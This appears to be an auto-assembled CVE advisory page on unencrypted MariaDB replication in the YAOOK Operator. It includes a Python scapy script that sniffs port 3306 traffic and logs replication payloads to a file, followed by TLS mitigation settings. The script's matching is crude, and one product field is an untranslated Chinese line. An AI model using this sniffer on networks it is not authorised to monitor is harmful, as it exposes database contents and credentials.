CVE-2025-14758

Description

Incorrect configuration of replication security in the MariaDB component of the infra-operator in YAOOK Operator allows an on-path attacker to read database contents, potentially including credentials

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

YAOOK Operator infra-operator MariaDB组件（配置错误版本）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-14758 PoC - MariaDB Replication Traffic Interception
# This PoC demonstrates the concept of capturing unencrypted MariaDB replication traffic

import scapy.all as scapy
from scapy.layers.inet import IP, TCP
from scapy.layers.inet import Raw

def capture_mariadb_replication_traffic(packet):
    """
    Capture MariaDB replication packets on port 3306
    Note: This requires attacker to be on-path (network adjacency)
    """
    if packet.haslayer(TCP) and packet.haslayer(Raw):
        src_port = packet[TCP].sport
        dst_port = packet[TCP].dport
        
        # MariaDB default port
        if src_port == 3306 or dst_port == 3306:
            payload = packet[Raw].load
            
            # Check for replication protocol signatures
            if b'binlog' in payload.lower() or b'@' in payload:
                print(f"[+] Potential replication traffic captured from {packet[IP].src} to {packet[IP].dst}")
                print(f"[+] Payload preview: {payload[:100]}")
                
                # Log for later analysis
                with open('captured_replication.log', 'ab') as f:
                    f.write(payload)

# Sniff for MariaDB traffic (requires root privileges)
print("[*] Starting MariaDB replication traffic capture...")
print("[*] Press Ctrl+C to stop")
scapy.sniff(filter='tcp port 3306', prn=capture_mariadb_replication_traffic)

# Mitigation: Enable SSL/TLS for MariaDB replication
# Add to my.cnf:
# [mysqld]
# ssl-cert = /path/to/server-cert.pem
# ssl-key = /path/to/server-key.pem
# require_secure_transport = ON
# master_ssl_verify_server_cert = 1

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14758
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14758
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14758/
[4] VulDB https://vuldb.com/cve/CVE-2025-14758
[5] https://gitlab.com/yaook/operator/-/issues/631

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14758", "sourceIdentifier": "[email protected]", "published": "2025-12-16T01:15:47.267", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect configuration of replication security in the MariaDB component of the infra-operator in YAOOK Operator allows an on-path attacker to read database contents, potentially including credentials"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1188"}]}], "references": [{"url": "https://gitlab.com/yaook/operator/-/issues/631", "source": "[email protected]"}]}}